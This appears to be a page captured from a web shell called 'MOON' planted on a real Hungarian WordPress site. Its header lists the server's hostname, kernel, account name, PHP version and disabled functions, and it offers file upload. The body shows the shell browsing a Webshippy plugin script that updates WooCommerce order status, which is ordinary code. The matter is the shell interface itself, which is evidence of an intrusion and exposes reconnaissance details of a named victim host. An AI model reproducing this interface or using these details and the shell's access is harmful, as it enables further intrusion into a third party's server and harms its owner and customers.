MOON
Server: Apache
System: Linux server.royaltuning.hu 4.18.0-425.13.1.el8_7.x86_64 #1 SMP Tue Feb 21 04:20:52 EST 2023 x86_64
User: royaltuning (1001)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/royaltuning/www/public/wp-content/plugins/webshippy/
Upload Files
File: /home/royaltuning/www/public/wp-content/plugins/webshippy/webshippy_set_status.php
<?php

/**
 * User 'manual'
 *
 * @link (to call)
 * http://example.com/wp-content/plugins/webshippy/webshippy_set_status.php?id={order_id}&status={order_status}&secret={webshippy_secrect}
 *
 * order_id:
 *  the post id in wordpress posts table
 *
 * order_status (like enum):
 *  - pending     - Fizetésre vár
 *  - on-hold     - Fizetésre vár
 *  - processing  - Feldolgozás alatt
 *  - failed      - Sikertelen
 *  - completed   - Teljesítve
 *  - refunded    - Visszatérítve
 *  - cancelled   - Visszamondva
 *
 * webshippy_secrect:
 *  - Webshippy Secret API Key
 */

// turn on output buffering
@ob_start();

// content type
@header('Content-type:text/plan;charset=utf-8');

$statusArr = array(
	'pending', // Fizetésre vár
	'on-hold', // Fizetésre vár
	'processing', // Feldolgozás alatt
	'failed', // Sikertelen
	'completed', // Teljesítve
	'refunded', // Visszatérítve
	'cancelled', // Visszamondva
);

$status = trim($_GET['status']);

if (in_array($status, $statusArr) === false) {
	die('error|incorrect status.');
}

require_once __DIR__ . '/../../../wp-config.php';
global $wpdb;

// check secret
$secretID = $wpdb->get_var(
    $wpdb->prepare(
        "SELECT option_id FROM " . $table_prefix . "options
        WHERE option_name = 'webshippy_secrect' AND option_value = %s",
        $_GET['secret']
    )
);

if (empty($secretID)) {
	die('error|authentication failed. (1)');
}

$orderId = $_GET['id'];
$orderName = $_GET['name'];

/**
 * Check order
 */
$order = null;

$wpPosts = $wpdb->get_results(
    $wpdb->prepare(
        "
            SELECT 
                p.id,
                p.post_type
            FROM " . $table_prefix . "posts AS p 
            LEFT JOIN " . $table_prefix . "postmeta AS pm
                ON p.id = pm.post_id AND pm.meta_key  in ('_order_number', '_order_number_formatted')
            LEFT JOIN " . $table_prefix . "wc_orders_meta AS om
                ON p.id = om.order_id AND om.meta_key  in ('_order_number', '_order_number_formatted')
            WHERE 
                p.id = %d
                OR p.id = %d
                OR pm.meta_value = %s
                OR om.meta_value = %s",
        [
            (int)$orderId,
            preg_replace('/\D/','', $orderId),
            $orderName ?? $orderId,
            $orderName ?? $orderId
        ]
    )
);

foreach ($wpPosts as $post) {
    if ( !in_array($post->post_type, ['shop_order', 'shop_order_placehold'])) {
        continue;
    }

    $tmpOrder = new Wc_Order($post->id);

    if ($orderName && $tmpOrder->get_order_number() == $orderName) {
        $order = $tmpOrder;
        break;
    } elseif ($tmpOrder->get_id() == $orderId) {
        $order = $tmpOrder;
        break;
    }
}

if (empty($order)) {
    die('error|order is not found or post type is incorrect.');
}

if ($order->get_status() === $status) {
	die('success|ok');
}

if ($order->update_status($status, 'Triggered by Webshippy' . PHP_EOL) === true) {
	die('success|ok');
}


die('success|no-changes');
@ Telegram